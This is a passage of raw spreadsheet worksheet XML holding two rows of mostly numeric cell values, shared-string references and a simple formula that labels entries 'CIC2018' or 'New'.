        <v>0</v>
      </c>
      <c r="NQ67" s="117">
        <v>0</v>
      </c>
      <c r="NR67" s="118">
        <v>0</v>
      </c>
      <c r="NS67" s="507">
        <v>0</v>
      </c>
      <c r="NT67" s="119">
        <v>0</v>
      </c>
      <c r="NU67" s="119">
        <v>0</v>
      </c>
      <c r="NV67" s="119">
        <v>0</v>
      </c>
      <c r="NW67" s="117">
        <v>11</v>
      </c>
      <c r="NX67" s="118" t="s">
        <v>4248</v>
      </c>
      <c r="NY67" s="507">
        <v>1</v>
      </c>
      <c r="NZ67" s="119" t="s">
        <v>3483</v>
      </c>
      <c r="OA67" s="119">
        <v>1</v>
      </c>
      <c r="OB67" s="119">
        <v>1</v>
      </c>
      <c r="OC67" s="120">
        <v>0</v>
      </c>
      <c r="OD67" s="120">
        <v>0</v>
      </c>
      <c r="OE67" s="120">
        <v>0</v>
      </c>
      <c r="OF67" s="121">
        <v>0</v>
      </c>
      <c r="OG67" s="120">
        <v>0</v>
      </c>
      <c r="OH67" s="120">
        <v>0</v>
      </c>
      <c r="OI67" s="120">
        <v>0</v>
      </c>
      <c r="OJ67" s="120">
        <v>0</v>
      </c>
      <c r="OK67" s="383"/>
      <c r="OL67" s="120">
        <v>0</v>
      </c>
      <c r="OM67" s="120">
        <v>0</v>
      </c>
      <c r="ON67" s="120">
        <v>0</v>
      </c>
      <c r="OO67" s="120"/>
      <c r="OP67" s="120">
        <v>0</v>
      </c>
      <c r="OQ67" s="464">
        <v>0</v>
      </c>
      <c r="OR67" s="120">
        <v>0</v>
      </c>
      <c r="OS67" s="120">
        <v>0</v>
      </c>
      <c r="OT67" s="120">
        <v>0</v>
      </c>
      <c r="OU67" s="120"/>
      <c r="OV67" s="120">
        <v>0</v>
      </c>
      <c r="OW67" s="464">
        <v>0</v>
      </c>
      <c r="OX67" s="120">
        <v>0</v>
      </c>
      <c r="OY67" s="120">
        <v>0</v>
      </c>
      <c r="OZ67" s="120">
        <v>0</v>
      </c>
      <c r="PA67" s="120"/>
      <c r="PB67" s="120">
        <v>0</v>
      </c>
      <c r="PC67" s="464">
        <v>0</v>
      </c>
      <c r="PD67" s="120">
        <v>0</v>
      </c>
      <c r="PE67" s="120">
        <v>0</v>
      </c>
      <c r="PF67" s="120">
        <v>0</v>
      </c>
      <c r="PG67" s="120"/>
      <c r="PH67" s="120">
        <v>0</v>
      </c>
      <c r="PI67" s="464">
        <v>0</v>
      </c>
      <c r="PJ67" s="120">
        <v>0</v>
      </c>
      <c r="PK67" s="120">
        <v>0</v>
      </c>
      <c r="PL67" s="120">
        <v>0</v>
      </c>
      <c r="PM67" s="120"/>
      <c r="PN67" s="120">
        <v>0</v>
      </c>
      <c r="PO67" s="464">
        <v>0</v>
      </c>
      <c r="PP67" s="120">
        <v>0</v>
      </c>
      <c r="PQ67" s="120">
        <v>0</v>
      </c>
      <c r="PR67" s="120">
        <v>0</v>
      </c>
      <c r="PS67" s="120"/>
      <c r="PT67" s="120">
        <v>0</v>
      </c>
      <c r="PU67" s="464">
        <v>0</v>
      </c>
      <c r="PV67" s="120">
        <v>0</v>
      </c>
      <c r="PW67" s="120">
        <v>0</v>
      </c>
      <c r="PX67" s="120">
        <v>0</v>
      </c>
      <c r="PY67" s="120"/>
      <c r="PZ67" s="120">
        <v>0</v>
      </c>
      <c r="QA67" s="464">
        <v>0</v>
      </c>
      <c r="QB67" s="120">
        <v>0</v>
      </c>
      <c r="QC67" s="120">
        <v>0</v>
      </c>
      <c r="QD67" s="120">
        <v>0</v>
      </c>
      <c r="QE67" s="120"/>
      <c r="QF67" s="120">
        <v>0</v>
      </c>
      <c r="QG67" s="464">
        <v>0</v>
      </c>
      <c r="QH67" s="120">
        <v>0</v>
      </c>
      <c r="QI67" s="120">
        <v>0</v>
      </c>
      <c r="QJ67" s="120">
        <v>0</v>
      </c>
      <c r="QK67" s="120"/>
      <c r="QL67" s="120">
        <v>0</v>
      </c>
      <c r="QM67" s="464">
        <v>0</v>
      </c>
      <c r="QN67" s="120">
        <v>0</v>
      </c>
      <c r="QO67" s="120">
        <v>0</v>
      </c>
      <c r="QP67" s="120">
        <v>0</v>
      </c>
      <c r="QQ67" s="120"/>
      <c r="QR67" s="120">
        <v>0</v>
      </c>
      <c r="QS67" s="464">
        <v>0</v>
      </c>
      <c r="QT67" s="184"/>
      <c r="QU67" s="184"/>
      <c r="QV67" s="184"/>
      <c r="QW67" s="184"/>
      <c r="QX67" s="184"/>
      <c r="QY67" s="184"/>
      <c r="QZ67" s="184"/>
      <c r="RA67" s="184"/>
      <c r="RB67" s="184"/>
      <c r="RC67" s="184"/>
      <c r="RD67" s="184"/>
      <c r="RE67" s="184"/>
      <c r="RF67" s="184"/>
      <c r="RG67" s="184"/>
      <c r="RH67" s="184"/>
      <c r="RI67" s="184"/>
      <c r="RJ67" s="184"/>
      <c r="RK67" s="184"/>
      <c r="RL67" s="184"/>
      <c r="RM67" s="184"/>
      <c r="RN67" s="184"/>
      <c r="RO67" s="184"/>
      <c r="RP67" s="184"/>
      <c r="RQ67" s="184"/>
      <c r="RR67" s="184"/>
      <c r="RS67" s="184"/>
      <c r="RT67" s="184"/>
      <c r="RU67" s="184"/>
      <c r="RV67" s="184"/>
      <c r="RW67" s="184"/>
      <c r="RX67" s="184"/>
      <c r="RY67" s="184"/>
      <c r="RZ67" s="184"/>
      <c r="SA67" s="184"/>
      <c r="SB67" s="184"/>
      <c r="SC67" s="184"/>
      <c r="SD67" s="184"/>
      <c r="SE67" s="184"/>
      <c r="SF67" s="184"/>
      <c r="SG67" s="184"/>
      <c r="SH67" s="184"/>
      <c r="SI67" s="184"/>
      <c r="SJ67" s="184"/>
      <c r="SK67" s="184"/>
      <c r="SL67" s="184"/>
      <c r="SM67" s="184"/>
      <c r="SN67" s="184"/>
      <c r="SO67" s="184"/>
      <c r="SP67" s="184"/>
      <c r="SQ67" s="184"/>
      <c r="SR67" s="184"/>
      <c r="SS67" s="184"/>
      <c r="ST67" s="184"/>
      <c r="SU67" s="184"/>
      <c r="SV67" s="184"/>
      <c r="SW67" s="184"/>
      <c r="SX67" s="184"/>
      <c r="SY67" s="184"/>
      <c r="SZ67" s="184"/>
      <c r="TA67" s="184"/>
      <c r="TB67" s="184"/>
      <c r="TC67" s="184"/>
      <c r="TD67" s="184"/>
      <c r="TE67" s="184"/>
      <c r="TF67" s="184"/>
      <c r="TG67" s="184"/>
      <c r="TH67" s="184"/>
      <c r="TI67" s="184"/>
      <c r="TJ67" s="184"/>
      <c r="TK67" s="184"/>
      <c r="TL67" s="184"/>
      <c r="TM67" s="184"/>
      <c r="TN67" s="184"/>
      <c r="TO67" s="184"/>
      <c r="TP67" s="184"/>
      <c r="TQ67" s="184"/>
      <c r="TR67" s="184"/>
      <c r="TS67" s="184"/>
      <c r="TT67" s="184"/>
      <c r="TU67" s="184"/>
      <c r="TV67" s="184"/>
      <c r="TW67" s="184"/>
      <c r="TX67" s="184"/>
      <c r="TY67" s="184"/>
      <c r="TZ67" s="184"/>
      <c r="UA67" s="184"/>
      <c r="UB67" s="184"/>
      <c r="UC67" s="184"/>
      <c r="UD67" s="184"/>
      <c r="UE67" s="184"/>
      <c r="UF67" s="184"/>
      <c r="UG67" s="184"/>
      <c r="UH67" s="184"/>
      <c r="UI67" s="184"/>
      <c r="UJ67" s="184"/>
      <c r="UK67" s="184"/>
      <c r="UL67" s="184"/>
      <c r="UM67" s="184"/>
      <c r="UN67" s="184"/>
      <c r="UO67" s="184"/>
      <c r="UP67" s="184"/>
      <c r="UQ67" s="184"/>
      <c r="UR67" s="184"/>
      <c r="US67" s="184"/>
      <c r="UT67" s="184"/>
      <c r="UU67" s="184"/>
      <c r="UV67" s="184"/>
      <c r="UW67" s="184"/>
      <c r="UX67" s="184"/>
      <c r="UY67" s="184"/>
      <c r="UZ67" s="184"/>
      <c r="VA67" s="184"/>
      <c r="VB67" s="184"/>
      <c r="VC67" s="184"/>
      <c r="VD67" s="184"/>
      <c r="VE67" s="184"/>
      <c r="VF67" s="184"/>
      <c r="VG67" s="184"/>
      <c r="VH67" s="184"/>
      <c r="VI67" s="184"/>
      <c r="VJ67" s="184"/>
      <c r="VK67" s="184"/>
      <c r="VL67" s="184"/>
      <c r="VM67" s="184"/>
      <c r="VN67" s="184"/>
      <c r="VO67" s="184"/>
      <c r="VP67" s="184"/>
      <c r="VQ67" s="184"/>
      <c r="VR67" s="184"/>
      <c r="VS67" s="184"/>
      <c r="VT67" s="184"/>
      <c r="VU67" s="184"/>
      <c r="VV67" s="184"/>
      <c r="VW67" s="184"/>
      <c r="VX67" s="184"/>
      <c r="VY67" s="184"/>
    </row>
    <row r="68" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A68" s="82" t="s">
        <v>107</v>
      </c>
      <c r="B68" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C68" s="83" t="s">
        <v>466</v>
      </c>
      <c r="D68" s="83" t="s">
        <v>112</v>
      </c>
      <c r="E68" s="83">
        <f t="shared" si="2"/>
        <v>47</v>
      </c>
      <c r="F68" s="83" t="s">
        <v>113</v>
      </c>
      <c r="G68" s="94" t="s">
        <v>1331</v>
      </c>
      <c r="H68" s="83" t="s">
        <v>1332</v>
      </c>
      <c r="I68" s="81" t="s">
        <v>1343</v>
      </c>
      <c r="J68" s="85" t="s">
        <v>1253</v>
      </c>
      <c r="K68" s="81" t="s">
        <v>880</v>
      </c>
      <c r="L68" s="81" t="s">
        <v>1351</v>
      </c>
      <c r="M68" s="378" t="s">
        <v>274</v>
      </c>
      <c r="N68" s="74" t="str">
        <f t="shared" si="3"/>
        <v>OK</v>
      </c>
      <c r="O68" s="485" t="str">
        <f t="shared" ref="O68:O112" si="4">IF(ISNUMBER(SEARCH("C2018",L68)),"CIC2018","New")</f>
        <v>CIC2018</v>
      </c>
      <c r="P68" s="91"/>
      <c r="Q68" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R68" s="92" t="s">
        <v>1346</v>
      </c>
      <c r="S68" s="93" t="s">
        <v>843</v>
      </c>
      <c r="T68" s="92" t="s">
        <v>1347</v>
      </c>
      <c r="U68" s="94" t="s">
        <v>4</v>
      </c>
      <c r="V68" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W68" s="96" t="s">
        <v>1320</v>
      </c>
      <c r="X68" s="97" t="s">
        <v>886</v>
      </c>
      <c r="Y68" s="83" t="s">
        <v>1352</v>
      </c>
      <c r="Z68" s="98" t="s">
        <v>1338</v>
      </c>
      <c r="AA68" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB68" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC68" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD68" s="83"/>
      <c r="AE68" s="83"/>
      <c r="AF68" s="384" t="s">
        <v>745</v>
      </c>
      <c r="AG68" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH68" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI68" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ68" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK68" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL68" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM68" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN68" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO68" s="356" t="s">
        <v>747</v>
      </c>
      <c r="AP68" s="357" t="s">
        <v>745</v>
      </c>
      <c r="AQ68" s="646">
        <v>110</v>
      </c>
      <c r="AR68" s="647"/>
      <c r="AS68" s="647">
        <v>110</v>
      </c>
      <c r="AT68" s="647">
        <v>0</v>
      </c>
      <c r="AU68" s="647">
        <v>110</v>
      </c>
      <c r="AV68" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW68" s="647">
        <v>1</v>
      </c>
      <c r="AX68" s="647">
        <v>1</v>
      </c>
      <c r="AY68" s="647">
        <v>0</v>
      </c>
      <c r="AZ68" s="647">
        <v>1</v>
      </c>
      <c r="BA68" s="381" t="s">
        <v>4894</v>
      </c>
      <c r="BB68" s="101">
        <v>0</v>
      </c>
      <c r="BC68" s="102">
        <v>0</v>
      </c>
      <c r="BD68" s="102">
        <v>0</v>
      </c>
      <c r="BE68" s="103">
        <v>0</v>
      </c>
      <c r="BF68" s="103">
        <v>0</v>
      </c>
      <c r="BG68" s="104">
        <v>0</v>
      </c>
      <c r="BH68" s="105">
        <v>0</v>
      </c>
      <c r="BI68" s="106">
        <v>0</v>
      </c>
      <c r="BJ68" s="497">
        <v>0</v>
      </c>
      <c r="BK68" s="107">
        <v>0</v>
      </c>
      <c r="BL68" s="107">
        <v>0</v>
      </c>
      <c r="BM68" s="108">
        <v>0</v>
      </c>
      <c r="BN68" s="109">
        <v>0</v>
      </c>
      <c r="BO68" s="110">
        <v>0</v>
      </c>
      <c r="BP68" s="501">
        <v>0</v>
      </c>
      <c r="BQ68" s="111">
        <v>0</v>
      </c>
      <c r="BR68" s="111">
        <v>0</v>
      </c>
      <c r="BS68" s="112">
        <v>0</v>
      </c>
      <c r="BT68" s="113">
        <v>61</v>
      </c>
      <c r="BU68" s="114" t="s">
        <v>3484</v>
      </c>
      <c r="BV68" s="503">
        <v>10</v>
      </c>
      <c r="BW68" s="115" t="s">
        <v>1929</v>
      </c>
      <c r="BX68" s="115">
        <v>1</v>
      </c>
      <c r="BY68" s="116">
        <v>10</v>
      </c>
      <c r="BZ68" s="250">
        <v>20</v>
      </c>
      <c r="CA68" s="251" t="s">
        <v>1911</v>
      </c>
      <c r="CB68" s="505">
        <v>19</v>
      </c>
      <c r="CC68" s="252" t="s">
        <v>1910</v>
      </c>
      <c r="CD68" s="252">
        <v>1</v>
      </c>
      <c r="CE68" s="253">
        <v>19</v>
      </c>
      <c r="CF68" s="101">
        <v>81</v>
      </c>
      <c r="CG68" s="102" t="s">
        <v>3485</v>
      </c>
      <c r="CH68" s="102">
        <v>29</v>
      </c>
      <c r="CI68" s="103" t="s">
        <v>3486</v>
      </c>
      <c r="CJ68" s="103">
        <v>2</v>
      </c>
      <c r="CK68" s="104">
        <v>29</v>
      </c>
      <c r="CL68" s="105">
        <v>0</v>
      </c>
      <c r="CM68" s="106">
        <v>0</v>
      </c>
      <c r="CN68" s="497">
        <v>0</v>
      </c>
      <c r="CO68" s="107">
        <v>0</v>
      </c>
      <c r="CP68" s="107">
        <v>0</v>
      </c>
      <c r="CQ68" s="108">
        <v>0</v>
      </c>
      <c r="CR68" s="109">
        <v>5278</v>
      </c>
      <c r="CS68" s="110" t="s">
        <v>1954</v>
      </c>
      <c r="CT68" s="501">
        <v>10</v>
      </c>
      <c r="CU68" s="111" t="s">
        <v>1929</v>
      </c>
      <c r="CV68" s="111">
        <v>1</v>
      </c>
      <c r="CW68" s="112">
        <v>10</v>
      </c>
      <c r="CX68" s="113">
        <v>5278</v>
      </c>
      <c r="CY68" s="114" t="s">
        <v>1954</v>
      </c>
      <c r="CZ68" s="503">
        <v>10</v>
      </c>
      <c r="DA68" s="115" t="s">
        <v>1929</v>
      </c>
      <c r="DB68" s="115">
        <v>1</v>
      </c>
      <c r="DC68" s="116">
        <v>10</v>
      </c>
      <c r="DD68" s="101">
        <v>0</v>
      </c>
      <c r="DE68" s="102">
        <v>0</v>
      </c>
      <c r="DF68" s="102">
        <v>0</v>
      </c>
      <c r="DG68" s="103">
        <v>0</v>
      </c>
      <c r="DH68" s="103">
        <v>0</v>
      </c>
      <c r="DI68" s="104">
        <v>0</v>
      </c>
      <c r="DJ68" s="105">
        <v>0</v>
      </c>
      <c r="DK68" s="106">
        <v>0</v>
      </c>
      <c r="DL68" s="497">
        <v>0</v>
      </c>
      <c r="DM68" s="107">
        <v>0</v>
      </c>
      <c r="DN68" s="107">
        <v>0</v>
      </c>
      <c r="DO68" s="108">
        <v>0</v>
      </c>
      <c r="DP68" s="109">
        <v>0</v>
      </c>
      <c r="DQ68" s="110">
        <v>0</v>
      </c>
      <c r="DR68" s="501">
        <v>0</v>
      </c>
      <c r="DS68" s="111">
        <v>0</v>
      </c>
      <c r="DT68" s="111">
        <v>0</v>
      </c>
      <c r="DU68" s="112">
        <v>0</v>
      </c>
      <c r="DV68" s="113">
        <v>0</v>
      </c>
      <c r="DW68" s="114">
        <v>0</v>
      </c>
      <c r="DX68" s="503">
        <v>0</v>
      </c>
      <c r="DY68" s="115">
        <v>0</v>
      </c>
      <c r="DZ68" s="115">
        <v>0</v>
      </c>
      <c r="EA68" s="116">
        <v>0</v>
      </c>
      <c r="EB68" s="250">
        <v>0</v>
      </c>
      <c r="EC68" s="251">
        <v>0</v>
      </c>
      <c r="ED68" s="505">
        <v>0</v>
      </c>
      <c r="EE68" s="252">
        <v>0</v>
      </c>
      <c r="EF68" s="252">
        <v>0</v>
      </c>
      <c r="EG68" s="253">
        <v>0</v>
      </c>
      <c r="EH68" s="101">
        <v>0</v>
      </c>
      <c r="EI68" s="102">
        <v>0</v>
      </c>
      <c r="EJ68" s="102">
        <v>0</v>
      </c>
      <c r="EK68" s="103">
        <v>0</v>
      </c>
      <c r="EL68" s="103">
        <v>0</v>
      </c>
      <c r="EM68" s="104">
        <v>0</v>
      </c>
      <c r="EN68" s="105">
        <v>0</v>
      </c>
      <c r="EO68" s="106">
        <v>0</v>
      </c>
      <c r="EP68" s="497">
        <v>0</v>
      </c>
      <c r="EQ68" s="107">
        <v>0</v>
      </c>
      <c r="ER68" s="107">
        <v>0</v>
      </c>
      <c r="ES68" s="108">
        <v>0</v>
      </c>
      <c r="ET68" s="109">
        <v>0</v>
      </c>
      <c r="EU68" s="110">
        <v>0</v>
      </c>
      <c r="EV68" s="501">
        <v>0</v>
      </c>
      <c r="EW68" s="111">
        <v>0</v>
      </c>
      <c r="EX68" s="111">
        <v>0</v>
      </c>
      <c r="EY68" s="112">
        <v>0</v>
      </c>
      <c r="EZ68" s="113">
        <v>0</v>
      </c>
      <c r="FA68" s="114">
        <v>0</v>
      </c>
      <c r="FB68" s="503">
        <v>0</v>
      </c>
      <c r="FC68" s="115">
        <v>0</v>
      </c>
      <c r="FD68" s="115">
        <v>0</v>
      </c>
      <c r="FE68" s="116">
        <v>0</v>
      </c>
      <c r="FF68" s="101">
        <v>0</v>
      </c>
      <c r="FG68" s="102">
        <v>0</v>
      </c>
      <c r="FH68" s="102">
        <v>0</v>
      </c>
      <c r="FI68" s="103">
        <v>0</v>
      </c>
      <c r="FJ68" s="103">
        <v>0</v>
      </c>
      <c r="FK68" s="104">
        <v>0</v>
      </c>
      <c r="FL68" s="105">
        <v>0</v>
      </c>
      <c r="FM68" s="106">
        <v>0</v>
      </c>
      <c r="FN68" s="497">
        <v>0</v>
      </c>
      <c r="FO68" s="107">
        <v>0</v>
      </c>
      <c r="FP68" s="107">
        <v>0</v>
      </c>
      <c r="FQ68" s="108">
        <v>0</v>
      </c>
      <c r="FR68" s="109">
        <v>0</v>
      </c>
      <c r="FS68" s="110">
        <v>0</v>
      </c>
      <c r="FT68" s="501">
        <v>0</v>
      </c>
      <c r="FU68" s="111">
        <v>0</v>
      </c>
      <c r="FV68" s="111">
        <v>0</v>
      </c>
      <c r="FW68" s="112">
        <v>0</v>
      </c>
      <c r="FX68" s="113">
        <v>0</v>
      </c>
      <c r="FY68" s="114">
        <v>0</v>
      </c>
      <c r="FZ68" s="503">
        <v>0</v>
      </c>
      <c r="GA68" s="115">
        <v>0</v>
      </c>
      <c r="GB68" s="115">
        <v>0</v>
      </c>
      <c r="GC68" s="116">
        <v>0</v>
      </c>
      <c r="GD68" s="250">
        <v>20</v>
      </c>
      <c r="GE68" s="251" t="s">
        <v>1911</v>
      </c>
      <c r="GF68" s="505">
        <v>19</v>
      </c>
      <c r="GG68" s="252" t="s">
        <v>1910</v>
      </c>
      <c r="GH68" s="252">
        <v>1</v>
      </c>
      <c r="GI68" s="253">
        <v>19</v>
      </c>
      <c r="GJ68" s="101">
        <v>20</v>
      </c>
      <c r="GK68" s="102" t="s">
        <v>1911</v>
      </c>
      <c r="GL68" s="102">
        <v>19</v>
      </c>
      <c r="GM68" s="103" t="s">
        <v>1910</v>
      </c>
      <c r="GN68" s="103">
        <v>1</v>
      </c>
      <c r="GO68" s="104">
        <v>19</v>
      </c>
      <c r="GP68" s="105">
        <v>0</v>
      </c>
      <c r="GQ68" s="106">
        <v>0</v>
      </c>
      <c r="GR68" s="497">
        <v>0</v>
      </c>
      <c r="GS68" s="107">
        <v>0</v>
      </c>
      <c r="GT68" s="107">
        <v>0</v>
      </c>
      <c r="GU68" s="108">
        <v>0</v>
      </c>
      <c r="GV68" s="109">
        <v>0</v>
      </c>
      <c r="GW68" s="110">
        <v>0</v>
      </c>
      <c r="GX68" s="501">
        <v>0</v>
      </c>
      <c r="GY68" s="111">
        <v>0</v>
      </c>
      <c r="GZ68" s="111">
        <v>0</v>
      </c>
      <c r="HA68" s="112">
        <v>0</v>
      </c>
      <c r="HB68" s="113">
        <v>0</v>
      </c>
      <c r="HC68" s="114">
        <v>0</v>
      </c>
      <c r="HD68" s="503">
        <v>0</v>
      </c>
      <c r="HE68" s="115">
        <v>0</v>
      </c>
      <c r="HF68" s="115">
        <v>0</v>
      </c>
      <c r="HG68" s="116">
        <v>0</v>
      </c>
      <c r="HH68" s="101">
        <v>0</v>
      </c>
      <c r="HI68" s="102">
        <v>0</v>
      </c>
      <c r="HJ68" s="102">
        <v>0</v>
      </c>
      <c r="HK68" s="103">
        <v>0</v>
      </c>
      <c r="HL68" s="103">
        <v>0</v>
      </c>
      <c r="HM68" s="104">
        <v>0</v>
      </c>
      <c r="HN68" s="105">
        <v>0</v>
      </c>
      <c r="HO68" s="106">
        <v>0</v>
      </c>
      <c r="HP68" s="497">
        <v>0</v>
      </c>
      <c r="HQ68" s="107">
        <v>0</v>
      </c>
      <c r="HR68" s="107">
        <v>0</v>
      </c>
      <c r="HS68" s="108">
        <v>0</v>
      </c>
      <c r="HT68" s="109">
        <v>0</v>
      </c>
      <c r="HU68" s="110">
        <v>0</v>
      </c>
      <c r="HV68" s="501">
        <v>0</v>
      </c>
      <c r="HW68" s="111">
        <v>0</v>
      </c>
      <c r="HX68" s="111">
        <v>0</v>
      </c>
      <c r="HY68" s="112">
        <v>0</v>
      </c>
      <c r="HZ68" s="113">
        <v>61</v>
      </c>
      <c r="IA68" s="114" t="s">
        <v>3484</v>
      </c>
      <c r="IB68" s="503">
        <v>10</v>
      </c>
      <c r="IC68" s="115" t="s">
        <v>1929</v>
      </c>
      <c r="ID68" s="115">
        <v>1</v>
      </c>
      <c r="IE68" s="116">
        <v>10</v>
      </c>
      <c r="IF68" s="250">
        <v>0</v>
      </c>
      <c r="IG68" s="251">
        <v>0</v>
      </c>
      <c r="IH68" s="505">
        <v>0</v>
      </c>
      <c r="II68" s="252">
        <v>0</v>
      </c>
      <c r="IJ68" s="252">
        <v>0</v>
      </c>
      <c r="IK68" s="253">
        <v>0</v>
      </c>
      <c r="IL68" s="101">
        <v>61</v>
      </c>
      <c r="IM68" s="102" t="s">
        <v>3484</v>
      </c>
      <c r="IN68" s="102">
        <v>10</v>
      </c>
      <c r="IO68" s="103" t="s">
        <v>1929</v>
      </c>
      <c r="IP68" s="103">
        <v>1</v>
      </c>
      <c r="IQ68" s="104">
        <v>10</v>
      </c>
      <c r="IR68" s="105">
        <v>0</v>
      </c>
      <c r="IS68" s="106">
        <v>0</v>
      </c>
      <c r="IT68" s="497">
        <v>0</v>
      </c>
      <c r="IU68" s="107">
        <v>0</v>
      </c>
      <c r="IV68" s="107">
        <v>0</v>
      </c>
      <c r="IW68" s="108">
        <v>0</v>
      </c>
      <c r="IX68" s="109">
        <v>5278</v>
      </c>
      <c r="IY68" s="110" t="s">
        <v>1954</v>
      </c>
      <c r="IZ68" s="501">
        <v>10</v>
      </c>
      <c r="JA68" s="111" t="s">
        <v>1929</v>
      </c>
      <c r="JB68" s="111">
        <v>1</v>
      </c>
      <c r="JC68" s="112">
        <v>10</v>
      </c>
      <c r="JD68" s="113">
        <v>5278</v>
      </c>
      <c r="JE68" s="114" t="s">
        <v>1954</v>
      </c>
      <c r="JF68" s="503">
        <v>10</v>
      </c>
      <c r="JG68" s="115" t="s">
        <v>1929</v>
      </c>
      <c r="JH68" s="115">
        <v>1</v>
      </c>
      <c r="JI68" s="116">
        <v>10</v>
      </c>
      <c r="JJ68" s="101">
        <v>0</v>
      </c>
      <c r="JK68" s="102">
        <v>0</v>
      </c>
      <c r="JL68" s="102">
        <v>0</v>
      </c>
      <c r="JM68" s="103">
        <v>0</v>
      </c>
      <c r="JN68" s="103">
        <v>0</v>
      </c>
      <c r="JO68" s="104">
        <v>0</v>
      </c>
      <c r="JP68" s="105">
        <v>0</v>
      </c>
      <c r="JQ68" s="106">
        <v>0</v>
      </c>
      <c r="JR68" s="497">
        <v>0</v>
      </c>
      <c r="JS68" s="107">
        <v>0</v>
      </c>
      <c r="JT68" s="107">
        <v>0</v>
      </c>
      <c r="JU68" s="108">
        <v>0</v>
      </c>
      <c r="JV68" s="109">
        <v>0</v>
      </c>
      <c r="JW68" s="110">
        <v>0</v>
      </c>
      <c r="JX68" s="501">
        <v>0</v>
      </c>
      <c r="JY68" s="111">
        <v>0</v>
      </c>
      <c r="JZ68" s="111">
        <v>0</v>
      </c>
      <c r="KA68" s="112">
        <v>0</v>
      </c>
      <c r="KB68" s="113">
        <v>0</v>
      </c>
      <c r="KC68" s="114">
        <v>0</v>
      </c>
      <c r="KD68" s="503">
        <v>0</v>
      </c>
      <c r="KE68" s="115">
        <v>0</v>
      </c>
      <c r="KF68" s="115">
        <v>0</v>
      </c>
      <c r="KG68" s="116">
        <v>0</v>
      </c>
      <c r="KH68" s="250">
        <v>0</v>
      </c>
      <c r="KI68" s="251">
        <v>0</v>
      </c>
      <c r="KJ68" s="505">
        <v>0</v>
      </c>
      <c r="KK68" s="252">
        <v>0</v>
      </c>
      <c r="KL68" s="252">
        <v>0</v>
      </c>
      <c r="KM68" s="253">
        <v>0</v>
      </c>
      <c r="KN68" s="101">
        <v>0</v>
      </c>
      <c r="KO68" s="102">
        <v>0</v>
      </c>
      <c r="KP68" s="102">
        <v>0</v>
      </c>
      <c r="KQ68" s="103">
        <v>0</v>
      </c>
      <c r="KR68" s="103">
        <v>0</v>
      </c>
      <c r="KS68" s="104">
        <v>0</v>
      </c>
      <c r="KT68" s="105">
        <v>0</v>
      </c>
      <c r="KU68" s="106">
        <v>0</v>
      </c>
      <c r="KV68" s="497">
        <v>0</v>
      </c>
      <c r="KW68" s="107">
        <v>0</v>
      </c>
      <c r="KX68" s="107">
        <v>0</v>
      </c>
      <c r="KY68" s="108">
        <v>0</v>
      </c>
      <c r="KZ68" s="109">
        <v>0</v>
      </c>
      <c r="LA68" s="110">
        <v>0</v>
      </c>
      <c r="LB68" s="501">
        <v>0</v>
      </c>
      <c r="LC68" s="111">
        <v>0</v>
      </c>
      <c r="LD68" s="111">
        <v>0</v>
      </c>
      <c r="LE68" s="112">
        <v>0</v>
      </c>
      <c r="LF68" s="113">
        <v>0</v>
      </c>
      <c r="LG68" s="114">
        <v>0</v>
      </c>
      <c r="LH68" s="503">
        <v>0</v>
      </c>
      <c r="LI68" s="115">
        <v>0</v>
      </c>
      <c r="LJ68" s="115">
        <v>0</v>
      </c>
      <c r="LK68" s="116">
        <v>0</v>
      </c>
      <c r="LL68" s="117">
        <v>5276</v>
      </c>
      <c r="LM68" s="507">
        <v>1</v>
      </c>
      <c r="LN68" s="119">
        <v>0</v>
      </c>
      <c r="LO68" s="119">
        <v>1</v>
      </c>
      <c r="LP68" s="119">
        <v>1</v>
      </c>
      <c r="LQ68" s="119">
        <v>0</v>
      </c>
      <c r="LR68" s="119">
        <v>1</v>
      </c>
      <c r="LS68" s="119">
        <v>1</v>
      </c>
      <c r="LT68" s="382"/>
      <c r="LU68" s="117">
        <v>0</v>
      </c>
      <c r="LV68" s="118">
        <v>0</v>
      </c>
      <c r="LW68" s="507">
        <v>0</v>
      </c>
      <c r="LX68" s="119">
        <v>0</v>
      </c>
      <c r="LY68" s="119">
        <v>0</v>
      </c>
      <c r="LZ68" s="119">
        <v>0</v>
      </c>
      <c r="MA68" s="117">
        <v>0</v>
      </c>
      <c r="MB68" s="118">
        <v>0</v>
      </c>
      <c r="MC68" s="507">
        <v>0</v>
      </c>
      <c r="MD68" s="119">
        <v>0</v>
      </c>
      <c r="ME68" s="119">
        <v>0</v>
      </c>
      <c r="MF68" s="119">
        <v>0</v>
      </c>
      <c r="MG68" s="117">
        <v>0</v>
      </c>
      <c r="MH68" s="118">
        <v>0</v>
      </c>
      <c r="MI68" s="507">
        <v>0</v>
      </c>
      <c r="MJ68" s="119">
        <v>0</v>
      </c>
      <c r="MK68" s="119">
        <v>0</v>
      </c>
      <c r="ML68" s="119">
        <v>0</v>
      </c>
      <c r="MM68" s="117">
        <v>0</v>
      </c>
      <c r="MN68" s="118">
        <v>0</v>
      </c>
      <c r="MO68" s="507">
        <v>0</v>
      </c>
      <c r="MP68" s="119">
        <v>0</v>
      </c>
      <c r="MQ68" s="119">
        <v>0</v>
      </c>
      <c r="MR68" s="119">
        <v>0</v>
      </c>
      <c r="MS68" s="117">
        <v>0</v>
      </c>
      <c r="MT68" s="118">
        <v>0</v>
      </c>
      <c r="MU68" s="507">
        <v>0</v>
      </c>
      <c r="MV68" s="119">
        <v>0</v>
      </c>
      <c r="MW68" s="119">
        <v>0</v>
      </c>
      <c r="MX68" s="119">
        <v>0</v>
      </c>
      <c r="MY68" s="117">
        <v>0</v>
      </c>
      <c r="MZ68" s="118">
        <v>0</v>
      </c>
      <c r="NA68" s="507">
        <v>0</v>
      </c>
      <c r="NB68" s="119">
        <v>0</v>
      </c>
      <c r="NC68" s="119">
